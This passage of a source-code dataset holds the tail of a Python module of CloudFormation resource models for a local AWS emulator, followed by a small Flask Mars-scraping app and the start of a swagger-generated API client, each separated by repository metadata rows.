                    filter_rules = notif_cfg.get('Filter', {}).get('S3Key', {}).get('Rules')
                    entry = {
                        attrs[2]: notif_cfg[attrs[3]],
                        'Events': [notif_cfg['Event']]
                    }
                    if filter_rules:
                        entry['Filter'] = {'Key': {'FilterRules': filter_rules}}
                    attrs[1].append(entry)
            # construct final result
            result = {
                'Bucket': params.get('BucketName') or PLACEHOLDER_RESOURCE_NAME,
                'NotificationConfiguration': {
                    'LambdaFunctionConfigurations': lambda_configs,
                    'QueueConfigurations': queue_configs,
                    'TopicConfigurations': topic_configs
                }
            }
            return result
        def get_bucket_location_config(**kwargs):
            # us-east-1 must not receive a LocationConstraint
            region = aws_stack.get_region()
            if region == AWS_REGION_US_EAST_1:
                return None
            return {'LocationConstraint': region}
        # two-step create: create the bucket, then apply notification config
        result = {
            'create': [{
                'function': 'create_bucket',
                'parameters': {
                    'Bucket': ['BucketName', PLACEHOLDER_RESOURCE_NAME],
                    'ACL': lambda params, **kwargs: convert_acl_cf_to_s3(params.get('AccessControl', 'PublicRead')),
                    'CreateBucketConfiguration': lambda params, **kwargs: get_bucket_location_config()
                }
            }, {
                'function': 'put_bucket_notification_configuration',
                'parameters': s3_bucket_notification_config
            }],
            'delete': [{
                'function': 'delete_bucket',
                'parameters': {
                    'Bucket': 'BucketName'
                }
            }]
        }
        return result
    def fetch_state(self, stack_name, resources):
        """Return bucket state; None while configured notifications are missing."""
        props = self.props
        bucket_name = props.get('BucketName') or self.resource_id
        bucket_name = self.resolve_refs_recursively(stack_name, bucket_name, resources)
        bucket_name = self.normalize_bucket_name(bucket_name)
        s3_client = aws_stack.connect_to_service('s3')
        response = s3_client.get_bucket_location(Bucket=bucket_name)
        notifs = props.get('NotificationConfiguration')
        if not response or not notifs:
            return response
        configs = s3_client.get_bucket_notification_configuration(Bucket=bucket_name)
        has_notifs = (configs.get('TopicConfigurations') or configs.get('QueueConfigurations') or
            configs.get('LambdaFunctionConfigurations'))
        if notifs and not has_notifs:
            # notifications requested but not yet applied -> treat as undeployed
            return None
        return response
    def get_cfn_attribute(self, attribute_name):
        # domain-name attributes point at the local endpoint
        if attribute_name in ['DomainName', 'RegionalDomainName']:
            return LOCALHOST
        return super(S3Bucket, self).get_cfn_attribute(attribute_name)
class S3BucketPolicy(GenericBaseModel):
    """CloudFormation model for AWS::S3::BucketPolicy."""

    @staticmethod
    def cloudformation_type():
        return 'AWS::S3::BucketPolicy'

    def fetch_state(self, stack_name, resources):
        """Return the policy of the referenced bucket."""
        bucket = self.props.get('Bucket') or self.resource_id
        bucket = self.resolve_refs_recursively(stack_name, bucket, resources)
        s3 = aws_stack.connect_to_service('s3')
        return s3.get_bucket_policy(Bucket=bucket)
class SQSQueue(GenericBaseModel, MotoQueue):
    """CloudFormation model for AWS::SQS::Queue (also inherits moto's Queue)."""
    @staticmethod
    def cloudformation_type():
        return 'AWS::SQS::Queue'
    def get_resource_name(self):
        return self.props.get('QueueName')
    def get_physical_resource_id(self, attribute=None, **kwargs):
        """Return the queue URL (or its ARN when the 'Arn' attribute is requested)."""
        queue_url = None
        props = self.props
        try:
            queue_url = aws_stack.get_sqs_queue_url(props.get('QueueName'))
        except Exception as e:
            # raise a retryable dependency error while the queue doesn't exist yet;
            # NOTE(review): any other exception is silently swallowed here
            if 'NonExistentQueue' in str(e):
                raise DependencyNotYetSatisfied(resource_ids=self.resource_id, message='Unable to get queue: %s' % e)
        if attribute == 'Arn':
            return aws_stack.sqs_queue_arn(props.get('QueueName'))
        return queue_url
    def fetch_state(self, stack_name, resources):
        """Look up the queue by name and return its attributes (incl. 'Arn')."""
        queue_name = self.resolve_refs_recursively(stack_name, self.props['QueueName'], resources)
        sqs_client = aws_stack.connect_to_service('sqs')
        queues = sqs_client.list_queues()
        result = list(filter(lambda item:
            # TODO possibly find a better way to compare resource_id with queue URLs
            item.endswith('/%s' % queue_name), queues.get('QueueUrls', [])))
        if not result:
            return None
        result = sqs_client.get_queue_attributes(QueueUrl=result[0], AttributeNames=['All'])['Attributes']
        result['Arn'] = result['QueueArn']
        return result
    @staticmethod
    def get_deploy_templates():
        def _queue_url(params, resources, resource_id, **kwargs):
            # prefer recorded physical id / QueueUrl; otherwise derive from the ARN
            resource = SQSQueue(resources[resource_id])
            props = resource.props
            queue_url = resource.physical_resource_id or props.get('QueueUrl')
            if queue_url:
                return queue_url
            return aws_stack.sqs_queue_url_for_arn(props['QueueArn'])
        return {
            'create': {
                'function': 'create_queue',
                'parameters': {
                    'QueueName': ['QueueName', PLACEHOLDER_RESOURCE_NAME],
                    'Attributes': params_select_attributes(
                        'ContentBasedDeduplication', 'DelaySeconds', 'FifoQueue', 'MaximumMessageSize',
                        'MessageRetentionPeriod', 'VisibilityTimeout', 'RedrivePolicy', 'ReceiveMessageWaitTimeSeconds'
                    ),
                    'tags': params_list_to_dict('Tags')
                }
            },
            'delete': {
                'function': 'delete_queue',
                'parameters': {
                    'QueueUrl': _queue_url
                }
            }
        }
class SNSTopic(GenericBaseModel):
    """CloudFormation model for AWS::SNS::Topic."""

    @staticmethod
    def cloudformation_type():
        return 'AWS::SNS::Topic'

    def get_physical_resource_id(self, attribute=None, **kwargs):
        return aws_stack.sns_topic_arn(self.props['TopicName'])

    def fetch_state(self, stack_name, resources):
        """Find the topic whose ARN ends in TopicName; None if not created yet."""
        name = self.resolve_refs_recursively(stack_name, self.props['TopicName'], resources)
        listing = aws_stack.connect_to_service('sns').list_topics()
        matches = [t for t in listing.get('Topics', []) if t['TopicArn'].split(':')[-1] == name]
        if matches:
            return matches[0]
        return None

    @staticmethod
    def get_deploy_templates():
        def _topic_arn(params, resources, resource_id, **kwargs):
            # prefer the recorded physical id; otherwise derive the ARN from props
            model = SNSTopic(resources[resource_id])
            return model.physical_resource_id or model.get_physical_resource_id()
        return {
            'create': {
                'function': 'create_topic',
                'parameters': {
                    'Name': 'TopicName',
                    'Tags': 'Tags'
                }
            },
            'delete': {
                'function': 'delete_topic',
                'parameters': {
                    'TopicArn': _topic_arn
                }
            }
        }
class SNSSubscription(GenericBaseModel):
    """CloudFormation model for AWS::SNS::Subscription."""
    @staticmethod
    def cloudformation_type():
        return 'AWS::SNS::Subscription'
    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.props.get('SubscriptionArn')
    def fetch_state(self, stack_name, resources):
        """Match an existing subscription by topic + protocol + endpoint."""
        props = self.props
        topic_arn = props.get('TopicArn')
        topic_arn = self.resolve_refs_recursively(stack_name, topic_arn, resources)
        if topic_arn is None:
            return
        subs = aws_stack.connect_to_service('sns').list_subscriptions_by_topic(TopicArn=topic_arn)
        result = [sub for sub in subs['Subscriptions'] if
            props.get('Protocol') == sub['Protocol'] and props.get('Endpoint') == sub['Endpoint']]
        # TODO: use get_subscription_attributes to compare FilterPolicy
        return result[0] if result else None
    @staticmethod
    def get_deploy_templates():
        def sns_subscription_arn(params, resources, resource_id, **kwargs):
            # the ARN for deletion is the recorded physical resource id
            resource = resources[resource_id]
            return resource['PhysicalResourceId']
        def sns_subscription_params(params, **kwargs):
            # subscription attributes must be strings (JSON for dict/list values)
            def attr_val(val):
                return json.dumps(val) if isinstance(val, (dict, list)) else str(val)
            attrs = ['DeliveryPolicy', 'FilterPolicy', 'RawMessageDelivery', 'RedrivePolicy']
            result = dict([(a, attr_val(params[a])) for a in attrs if a in params])
            return result
        return {
            'create': {
                'function': 'subscribe',
                'parameters': {
                    'TopicArn': 'TopicArn',
                    'Protocol': 'Protocol',
                    'Endpoint': 'Endpoint',
                    'Attributes': sns_subscription_params
                }
            },
            'delete': {
                'function': 'unsubscribe',
                'parameters': {
                    'SubscriptionArn': sns_subscription_arn
                }
            }
        }
class DynamoDBTable(GenericBaseModel):
    """CloudFormation model for AWS::DynamoDB::Table."""

    @staticmethod
    def cloudformation_type():
        return 'AWS::DynamoDB::Table'

    def get_physical_resource_id(self, attribute=None, **kwargs):
        name = self.props.get('TableName')
        # Ref/id-like attributes yield the table name, everything else the ARN
        if attribute in REF_ID_ATTRS:
            return name
        return aws_stack.dynamodb_table_arn(name)

    def fetch_state(self, stack_name, resources):
        """Describe the table by name (raises if it does not exist)."""
        name = self.props.get('TableName') or self.resource_id
        name = self.resolve_refs_recursively(stack_name, name, resources)
        client = aws_stack.connect_to_service('dynamodb')
        return client.describe_table(TableName=name)
class QueuePolicy(GenericBaseModel):
    """CloudFormation model for AWS::SQS::QueuePolicy (type mapping only)."""

    @staticmethod
    def cloudformation_type():
        # resource type string this model handles
        return 'AWS::SQS::QueuePolicy'
class SSMParameter(GenericBaseModel):
    """CloudFormation model for AWS::SSM::Parameter."""
    @staticmethod
    def cloudformation_type():
        return 'AWS::SSM::Parameter'
    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.props.get('Name') or self.resource_id
    def fetch_state(self, stack_name, resources):
        """Return the parameter record; raises if it does not exist yet."""
        param_name = self.props.get('Name') or self.resource_id
        param_name = self.resolve_refs_recursively(stack_name, param_name, resources)
        return aws_stack.connect_to_service('ssm').get_parameter(Name=param_name)['Parameter']
    @staticmethod
    def get_deploy_templates():
        # put_parameter: Tags converted to a list, plus whitelisted scalar params
        return {
            'create': {
                'function': 'put_parameter',
                'parameters': merge_parameters(params_dict_to_list('Tags', wrapper='Tags'), select_parameters(
                    'Name', 'Type', 'Value', 'Description', 'AllowedPattern', 'Policies', 'Tier'))
            }
        }
class SecretsManagerSecret(GenericBaseModel):
    """CloudFormation model for AWS::SecretsManager::Secret."""

    @staticmethod
    def cloudformation_type():
        return 'AWS::SecretsManager::Secret'

    def fetch_state(self, stack_name, resources):
        """Describe the secret by name (raises if it does not exist)."""
        name = self.props.get('Name') or self.resource_id
        name = self.resolve_refs_recursively(stack_name, name, resources)
        client = aws_stack.connect_to_service('secretsmanager')
        return client.describe_secret(SecretId=name)
class KMSKey(GenericBaseModel):
    """CloudFormation model for AWS::KMS::Key."""
    @staticmethod
    def cloudformation_type():
        return 'AWS::KMS::Key'
    def fetch_state(self, stack_name, resources):
        """Describe the key; without a physical id, match by tags/description/usage."""
        client = aws_stack.connect_to_service('kms')
        physical_res_id = self.physical_resource_id
        props = self.props
        res_tags = props.get('Tags', [])
        if not physical_res_id:
            # TODO: find a more efficient approach for this?
            for key in client.list_keys()['Keys']:
                details = client.describe_key(KeyId=key['KeyId'])['KeyMetadata']
                tags = client.list_resource_tags(KeyId=key['KeyId']).get('Tags', [])
                # normalize KMS TagKey/TagValue pairs to the CF Key/Value shape
                tags = [{'Key': tag['TagKey'], 'Value': tag['TagValue']} for tag in tags]
                if (tags == res_tags and details.get('Description') == props.get('Description') and
                        props.get('KeyUsage') in [None, details.get('KeyUsage')]):
                    physical_res_id = key['KeyId']
                    # TODO should this be removed from here? It seems that somewhere along the execution
                    # chain the 'PhysicalResourceId' gets overwritten with None, hence setting it here
                    self.resource_json['PhysicalResourceId'] = physical_res_id
                    break
        if not physical_res_id:
            return
        return client.describe_key(KeyId=physical_res_id)
    def get_physical_resource_id(self, attribute=None, **kwargs):
        # Ref/id-like attributes return the key id; other attributes the key ARN
        if attribute in REF_ID_ATTRS:
            return self.physical_resource_id
        return self.physical_resource_id and aws_stack.kms_key_arn(self.physical_resource_id)
    @staticmethod
    def get_deploy_templates():
        def create_params(params, **kwargs):
            # map CF Key/Value tags back to the KMS TagKey/TagValue shape
            return {
                'Policy': params.get('KeyPolicy'),
                'Tags': [{'TagKey': tag['Key'], 'TagValue': tag['Value']} for tag in params.get('Tags', [])]
            }
        return {
            'create': {
                'function': 'create_key',
                'parameters': create_params
            },
            'delete': {
                # TODO Key needs to be deleted in KMS backend
                'function': 'schedule_key_deletion',
                'parameters': {
                    'KeyId': 'PhysicalResourceId'
                }
            }
        }
class KMSAlias(GenericBaseModel):
    """CloudFormation model for AWS::KMS::Alias."""

    @staticmethod
    def cloudformation_type():
        return 'AWS::KMS::Alias'

    def fetch_state(self, stack_name, resources):
        """Return the alias entry whose AliasName matches ours, or None."""
        kms = aws_stack.connect_to_service('kms')
        target_name = self.props.get('AliasName')
        hits = [entry for entry in kms.list_aliases()['Aliases'] if entry['AliasName'] == target_name]
        return hits[0] if hits else None

    @staticmethod
    def get_deploy_templates():
        return {
            'create': {
                'function': 'create_alias',
                'parameters': {
                    'AliasName': 'AliasName',
                    'TargetKeyId': 'TargetKeyId'
                }
            },
            'delete': {
                'function': 'delete_alias',
                'parameters': {
                    'AliasName': 'AliasName'
                }
            },
        }
class EC2Instance(GenericBaseModel):
    """CloudFormation model for AWS::EC2::Instance."""
    @staticmethod
    def cloudformation_type():
        return 'AWS::EC2::Instance'
    def fetch_state(self, stack_name, resources):
        """Describe the instance; None while no physical id has been recorded."""
        instance_id = self.physical_resource_id
        if not instance_id:
            return None
        client = aws_stack.connect_to_service('ec2')
        resp = client.describe_instances(InstanceIds=[instance_id])
        return resp['Reservations'][0]['Instances'][0]
    def update_resource(self, new_resource, stack_name, resources):
        """Apply instance-type/security-group updates and return the new state."""
        instance_id = new_resource['PhysicalResourceId']
        props = new_resource['Properties']
        # NOTE(review): groups may be None when neither property is present —
        # confirm modify_instance_attribute tolerates Groups=None
        groups = props.get('SecurityGroups', props.get('SecurityGroupIds'))
        client = aws_stack.connect_to_service('ec2')
        client.modify_instance_attribute(
            Attribute='instanceType',
            Groups=groups,
            InstanceId=instance_id,
            InstanceType={
                'Value': props['InstanceType']
            }
        )
        resp = client.describe_instances(
            InstanceIds=[
                instance_id
            ]
        )
        return resp['Reservations'][0]['Instances'][0]
class SecurityGroup(GenericBaseModel):
    """CloudFormation model for AWS::EC2::SecurityGroup."""

    @staticmethod
    def cloudformation_type():
        return 'AWS::EC2::SecurityGroup'

    def fetch_state(self, stack_name, resources):
        """Describe the security group by id (preferred) or by name."""
        group_id = self.props.get('GroupId')
        group_name = self.props.get('GroupName')
        ec2 = aws_stack.connect_to_service('ec2')
        if group_id:
            described = ec2.describe_security_groups(GroupIds=[group_id])
        else:
            described = ec2.describe_security_groups(GroupNames=[group_name])
        groups = described['SecurityGroups']
        return groups[0] if groups else None

    def get_physical_resource_id(self, attribute=None, **kwargs):
        if self.physical_resource_id:
            return self.physical_resource_id
        if attribute in REF_ID_ATTRS:
            return self.props.get('GroupId') or self.props.get('GroupName')

    @staticmethod
    def get_deploy_templates():
        return {
            'create': {
                'function': 'create_security_group',
                'parameters': {
                    'GroupName': 'GroupName',
                    'VpcId': 'VpcId',
                    'Description': 'GroupDescription'
                }
            },
            'delete': {
                'function': 'delete_security_group',
                'parameters': {
                    'GroupId': 'PhysicalResourceId'
                }
            }
        }
class EC2Subnet(GenericBaseModel):
    """CloudFormation model for AWS::EC2::Subnet."""

    @staticmethod
    def cloudformation_type():
        return 'AWS::EC2::Subnet'

    def fetch_state(self, stack_name, resources):
        """Describe the subnet matching our CIDR block within the VPC."""
        ec2 = aws_stack.connect_to_service('ec2')
        lookup_filters = [
            {'Name': 'cidr-block', 'Values': [self.props['CidrBlock']]},
            {'Name': 'vpc-id', 'Values': [self.props['VpcId']]}
        ]
        matching = ec2.describe_subnets(Filters=lookup_filters)['Subnets']
        return matching[0] if matching else None

    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.props.get('SubnetId')

    @staticmethod
    def get_deploy_templates():
        return {
            'create': {
                'function': 'create_subnet',
                'parameters': {
                    'VpcId': 'VpcId',
                    'CidrBlock': 'CidrBlock',
                    'OutpostArn': 'OutpostArn',
                    'Ipv6CidrBlock': 'Ipv6CidrBlock',
                    'AvailabilityZone': 'AvailabilityZone'
                    # TODO: add TagSpecifications
                }
            },
            'delete': {
                'function': 'delete_subnet',
                'parameters': {
                    'SubnetId': 'PhysicalResourceId'
                }
            }
        }
class EC2VPC(GenericBaseModel):
    """CloudFormation model for AWS::EC2::VPC."""

    @staticmethod
    def cloudformation_type():
        return 'AWS::EC2::VPC'

    def fetch_state(self, stack_name, resources):
        """Describe the VPC whose CIDR matches our CidrBlock property."""
        ec2 = aws_stack.connect_to_service('ec2')
        cidr_filter = [{'Name': 'cidr', 'Values': [self.props['CidrBlock']]}]
        vpcs = ec2.describe_vpcs(Filters=cidr_filter)['Vpcs']
        return vpcs[0] if vpcs else None

    @staticmethod
    def get_deploy_templates():
        return {
            'create': {
                'function': 'create_vpc',
                'parameters': {
                    'CidrBlock': 'CidrBlock',
                    'InstanceTenancy': 'InstanceTenancy'
                    # TODO: add TagSpecifications
                }
            },
            'delete': {
                'function': 'delete_vpc',
                'parameters': {
                    'VpcId': 'PhysicalResourceId'
                }
            }
        }

    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.physical_resource_id or self.props.get('VpcId')
class InstanceProfile(GenericBaseModel):
    """CloudFormation model for AWS::IAM::InstanceProfile."""

    @staticmethod
    def cloudformation_type():
        return 'AWS::IAM::InstanceProfile'

    def fetch_state(self, stack_name, resources):
        """Fetch the instance profile by name; None when no name is known yet."""
        profile_name = self.get_physical_resource_id()
        if not profile_name:
            return None
        iam = aws_stack.connect_to_service('iam')
        return iam.get_instance_profile(InstanceProfileName=profile_name)['InstanceProfile']

    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.physical_resource_id or self.props.get('InstanceProfileName')

    @staticmethod
    def get_deploy_templates():
        return {
            'create': {
                'function': 'create_instance_profile',
                'parameters': {
                    'InstanceProfileName': 'InstanceProfileName',
                    'Path': 'Path'
                }
            },
            'delete': {
                'function': 'delete_instance_profile',
                'parameters': {
                    'InstanceProfileName': 'InstanceProfileName'
                }
            }
        }
class EC2RouteTable(GenericBaseModel):
    """CloudFormation model for AWS::EC2::RouteTable."""
    @staticmethod
    def cloudformation_type():
        return 'AWS::EC2::RouteTable'
    def fetch_state(self, stack_name, resources):
        # only non-main route tables of the VPC are candidates (CF never manages main)
        client = aws_stack.connect_to_service('ec2')
        route_tables = client.describe_route_tables(
            Filters=[
                {'Name': 'vpc-id', 'Values': [self.props['VpcId']]},
                {'Name': 'association.main', 'Values': ['false']}
            ]
        )['RouteTables']
        return (route_tables or [None])[0]
    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.physical_resource_id or self.props.get('RouteTableId')
    @staticmethod
    def get_deploy_templates():
        return {
            'create': {
                'function': 'create_route_table',
                'parameters': {
                    'VpcId': 'VpcId',
                    # NOTE(review): when Tags is absent this yields 'Tags': None —
                    # confirm the backend accepts that
                    'TagSpecifications': lambda params, **kwargs: [
                        {
                            'ResourceType': 'route-table',
                            'Tags': params.get('Tags')
                        }
                    ]
                }
            },
            'delete': {
                'function': 'delete_route_table',
                'parameters': {
                    'RouteTableId': 'RouteTableId'
                }
            }
        }
class EC2Route(GenericBaseModel):
    """CloudFormation model for AWS::EC2::Route."""

    @staticmethod
    def cloudformation_type():
        return 'AWS::EC2::Route'

    def get_physical_resource_id(self, attribute=None, **kwargs):
        """Derive a synthetic id from the route table + destination CIDRs."""
        route_table = self.props.get('RouteTableId')
        cidr_v4 = self.props.get('DestinationCidrBlock')
        cidr_v6 = self.props.get('DestinationIpv6CidrBlock')
        return generate_route_id(route_table, cidr_v4, cidr_v6)

    @staticmethod
    def get_deploy_templates():
        return {
            'create': {
                'function': 'create_route',
                'parameters': {
                    'DestinationCidrBlock': 'DestinationCidrBlock',
                    'DestinationIpv6CidrBlock': 'DestinationIpv6CidrBlock',
                    'RouteTableId': 'RouteTableId'
                }
            },
            'delete': {
                'function': 'delete_route',
                'parameters': {
                    'DestinationCidrBlock': 'DestinationCidrBlock',
                    'DestinationIpv6CidrBlock': 'DestinationIpv6CidrBlock',
                    'RouteTableId': 'RouteTableId'
                }
            }
        }
class EC2InternetGateway(GenericBaseModel):
    """CloudFormation model for AWS::EC2::InternetGateway."""

    @staticmethod
    def cloudformation_type():
        return 'AWS::EC2::InternetGateway'

    def fetch_state(self, stack_name, resources):
        """Match an existing internet gateway by an exact Tags comparison."""
        ec2 = aws_stack.connect_to_service('ec2')
        wanted_tags = self.props.get('Tags')
        candidates = [g for g in ec2.describe_internet_gateways()['InternetGateways']
                      if g.get('Tags') == wanted_tags]
        return candidates[0] if candidates else None

    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.props.get('InternetGatewayId')

    @staticmethod
    def get_deploy_templates():
        def _create_params(params, **kwargs):
            # tag the gateway at creation time via TagSpecifications
            return {'TagSpecifications': [{'ResourceType': 'internet-gateway', 'Tags': params.get('Tags', [])}]}
        return {
            'create': {
                'function': 'create_internet_gateway',
                'parameters': _create_params
            }
        }
class EC2SubnetRouteTableAssociation(GenericBaseModel):
    """CloudFormation model for AWS::EC2::SubnetRouteTableAssociation."""
    @staticmethod
    def cloudformation_type():
        return 'AWS::EC2::SubnetRouteTableAssociation'
    def fetch_state(self, stack_name, resources):
        """Find the association of the route table matching our GatewayId."""
        client = aws_stack.connect_to_service('ec2')
        table_id = self.resolve_refs_recursively(stack_name, self.props.get('RouteTableId'), resources)
        gw_id = self.resolve_refs_recursively(stack_name, self.props.get('GatewayId'), resources)
        route_tables = client.describe_route_tables()['RouteTables']
        route_table = ([t for t in route_tables if t['RouteTableId'] == table_id] or [None])[0]
        if route_table:
            associations = route_table.get('Associations', [])
            # NOTE(review): matches on GatewayId only; subnet-based associations
            # carry a SubnetId instead — confirm this covers the subnet case
            association = [a for a in associations if a.get('GatewayId') == gw_id]
            return (association or [None])[0]
    def get_physical_resource_id(self, attribute=None, **kwargs):
        return self.props.get('RouteTableAssociationId')
    @staticmethod
    def get_deploy_templates():
        return {
            'create': {
                'function': 'associate_route_table',
                'parameters': {
                    'GatewayId': 'GatewayId',
                    'RouteTableId': 'RouteTableId',
                    'SubnetId': 'SubnetId'
                }
            }
        }
class EC2VPCGatewayAttachment(GenericBaseModel):
    """CloudFormation model for AWS::EC2::VPCGatewayAttachment."""
    @staticmethod
    def cloudformation_type():
        return 'AWS::EC2::VPCGatewayAttachment'
    def fetch_state(self, stack_name, resources):
        """Look up the attached internet or VPN gateway by its id."""
        client = aws_stack.connect_to_service('ec2')
        igw_id = self.resolve_refs_recursively(stack_name, self.props.get('InternetGatewayId'), resources)
        vpngw_id = self.resolve_refs_recursively(stack_name, self.props.get('VpnGatewayId'), resources)
        gateways = []
        if igw_id:
            gateways = client.describe_internet_gateways()['InternetGateways']
            gateways = [g for g in gateways if g['InternetGatewayId'] == igw_id]
        elif vpngw_id:
            gateways = client.describe_vpn_gateways()['VpnGateways']
            gateways = [g for g in gateways if g['VpnGatewayId'] == vpngw_id]
        return (gateways or [None])[0]
    def get_physical_resource_id(self, attribute=None, **kwargs):
        # NOTE(review): 'RouteTableAssociationId' looks copy-pasted from
        # EC2SubnetRouteTableAssociation; a VPCGatewayAttachment never carries
        # this property, so this likely always returns None — confirm intent
        return self.props.get('RouteTableAssociationId')
    @staticmethod
    def get_deploy_templates():
        def _attach_gateway(resource_id, resources, *args, **kwargs):
            # attach whichever gateway type (internet or VPN) is configured
            client = aws_stack.connect_to_service('ec2')
            resource = resources[resource_id]
            resource_props = resource.get('Properties')
            igw_id = resource_props.get('InternetGatewayId')
            vpngw_id = resource_props.get('VpnGatewayId')
            vpc_id = resource_props.get('VpcId')
            if igw_id:
                client.attach_internet_gateway(VpcId=vpc_id, InternetGatewayId=igw_id)
            elif vpngw_id:
                client.attach_vpn_gateway(VpcId=vpc_id, VpnGatewayId=vpngw_id)
        return {
            'create': {
                'function': _attach_gateway
            }
        }
| 39.421848 | 119 | 0.622831 |
022641df7a7bd853a0638f6d3893a3c50f1d5f2a | 685 | py | Python | mission_to_mars/app.py | cjdance/web-scraping-challenge | 020e5af5798dc8ffa7e679ba7338ced384d753c5 | [
"ADSL"
] | null | null | null | mission_to_mars/app.py | cjdance/web-scraping-challenge | 020e5af5798dc8ffa7e679ba7338ced384d753c5 | [
"ADSL"
] | null | null | null | mission_to_mars/app.py | cjdance/web-scraping-challenge | 020e5af5798dc8ffa7e679ba7338ced384d753c5 | [
"ADSL"
] | null | null | null | from flask import Flask, render_template, redirect
# App setup: Flask web app backed by a local MongoDB via flask_pymongo
from flask_pymongo import PyMongo
import scrape_mars
app = Flask(__name__)
# Use flask_pymongo to set up mongo connection
app.config["MONGO_URI"] = "mongodb://localhost:27017/phone_app"
mongo = PyMongo(app)
# Or set inline
# mongo = PyMongo(app, uri="mongodb://localhost:27017/phone_app")
@app.route("/")
def index():
mars = mongo.db.mars.find_one()
return render_template("index.html", mars=mars)
@app.route("/scrape")
def scraper():
mars_db = mongo.db.mars
mars = scrape_mars.scrape_info()
mars_db.update({}, mars, upsert=True)
return redirect("/")
if __name__ == "__main__":
app.run(debug=True) | 22.833333 | 65 | 0.708029 |
a89a376ea882f13ba7cc1ab769f9e4a6e4dc8760 | 25,066 | py | Python | tests/src/main/python/rest/tests/extract/swagger_client/api_client.py | IBM/quality-measure-and-cohort-service | 8963227bf4941d6a5fdc641b37ca0f72da5a6f2b | [
"Apache-2.0"
] | 1 | 2020-10-05T15:10:03.000Z | 2020-10-05T15:10:03.000Z | tests/src/main/python/rest/tests/extract/swagger_client/api_client.py | IBM/quality-measure-and-cohort-service | 8963227bf4941d6a5fdc641b37ca0f72da5a6f2b | [
"Apache-2.0"
] | null | null | null | tests/src/main/python/rest/tests/extract/swagger_client/api_client.py | IBM/quality-measure-and-cohort-service | 8963227bf4941d6a5fdc641b37ca0f72da5a6f2b | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
IBM Cohort Engine
Service to evaluate cohorts and measures # noqa: E501
OpenAPI spec version: 2.1.0 2022-02-18T21:50:45Z
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import datetime
import json
import mimetypes
from multiprocessing.pool import ThreadPool
import os
import re
import tempfile
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from swagger_client.configuration import Configuration
import swagger_client.models
from swagger_client import rest
class ApiClient(object):
    """Generic API client for Swagger client library builds.
    Swagger generic API client. This client handles the client-
    server communication, and is invariant across implementations. Specifics of
    the methods and models for each application are generated from the Swagger
    templates.
    NOTE: This class is auto generated by the swagger code generator program.
    Ref: https://github.com/swagger-api/swagger-codegen
    Do not edit the class manually.
    :param configuration: .Configuration object for this client
    :param header_name: a header to pass when making calls to the API.
    :param header_value: a header value to pass when making calls to
        the API.
    :param cookie: a cookie to include in the header when making calls
        to the API
    """
    # Types that deserialization returns as-is (no model construction).
    PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
    # Maps swagger spec type names to the Python types used when deserializing.
    NATIVE_TYPES_MAPPING = {
        'int': int,
        'long': int if six.PY3 else long,  # noqa: F821
        'float': float,
        'str': str,
        'bool': bool,
        'date': datetime.date,
        'datetime': datetime.datetime,
        'object': object,
    }
    def __init__(self, configuration=None, header_name=None, header_value=None,
                 cookie=None):
        if configuration is None:
            configuration = Configuration()
        self.configuration = configuration
        # Use the pool property to lazily initialize the ThreadPool.
        self._pool = None
        self.rest_client = rest.RESTClientObject(configuration)
        self.default_headers = {}
        if header_name is not None:
            self.default_headers[header_name] = header_value
        self.cookie = cookie
        # Set default User-Agent.
        self.user_agent = 'Swagger-Codegen/1.0.0/python'
        self.client_side_validation = configuration.client_side_validation
    def __del__(self):
        # Reclaim worker threads if an async pool was ever created.
        if self._pool is not None:
            self._pool.close()
            self._pool.join()
    @property
    def pool(self):
        # Created lazily so clients that never pass async_req pay no thread cost.
        if self._pool is None:
            self._pool = ThreadPool()
        return self._pool
    @property
    def user_agent(self):
        """User agent for this API client"""
        return self.default_headers['User-Agent']
    @user_agent.setter
    def user_agent(self, value):
        self.default_headers['User-Agent'] = value
    def set_default_header(self, header_name, header_value):
        """Set a header sent with every subsequent request."""
        self.default_headers[header_name] = header_value
    def __call_api(
            self, resource_path, method, path_params=None,
            query_params=None, header_params=None, body=None, post_params=None,
            files=None, response_type=None, auth_settings=None,
            _return_http_data_only=None, collection_formats=None,
            _preload_content=True, _request_timeout=None):
        """Build and execute a single HTTP request synchronously."""
        config = self.configuration
        # header parameters
        header_params = header_params or {}
        header_params.update(self.default_headers)
        if self.cookie:
            header_params['Cookie'] = self.cookie
        if header_params:
            header_params = self.sanitize_for_serialization(header_params)
            header_params = dict(self.parameters_to_tuples(header_params,
                                                           collection_formats))
        # path parameters
        if path_params:
            path_params = self.sanitize_for_serialization(path_params)
            path_params = self.parameters_to_tuples(path_params,
                                                    collection_formats)
            for k, v in path_params:
                # specified safe chars, encode everything
                resource_path = resource_path.replace(
                    '{%s}' % k,
                    quote(str(v), safe=config.safe_chars_for_path_param)
                )
        # query parameters
        if query_params:
            query_params = self.sanitize_for_serialization(query_params)
            query_params = self.parameters_to_tuples(query_params,
                                                     collection_formats)
        # post parameters
        if post_params or files:
            post_params = self.prepare_post_parameters(post_params, files)
            post_params = self.sanitize_for_serialization(post_params)
            post_params = self.parameters_to_tuples(post_params,
                                                    collection_formats)
        # auth setting
        self.update_params_for_auth(header_params, query_params, auth_settings)
        # body
        if body:
            body = self.sanitize_for_serialization(body)
        # request url
        url = self.configuration.host + resource_path
        # perform request and return response
        response_data = self.request(
            method, url, query_params=query_params, headers=header_params,
            post_params=post_params, body=body,
            _preload_content=_preload_content,
            _request_timeout=_request_timeout)
        self.last_response = response_data
        return_data = response_data
        if _preload_content:
            # deserialize response data
            if response_type:
                return_data = self.deserialize(response_data, response_type)
            else:
                return_data = None
        if _return_http_data_only:
            return (return_data)
        else:
            return (return_data, response_data.status,
                    response_data.getheaders())
    def sanitize_for_serialization(self, obj):
        """Builds a JSON POST object.
        If obj is None, return None.
        If obj is str, int, long, float, bool, return directly.
        If obj is datetime.datetime, datetime.date
            convert to string in iso8601 format.
        If obj is list, sanitize each element in the list.
        If obj is dict, return the dict.
        If obj is swagger model, return the properties dict.
        :param obj: The data to serialize.
        :return: The serialized form of data.
        """
        if obj is None:
            return None
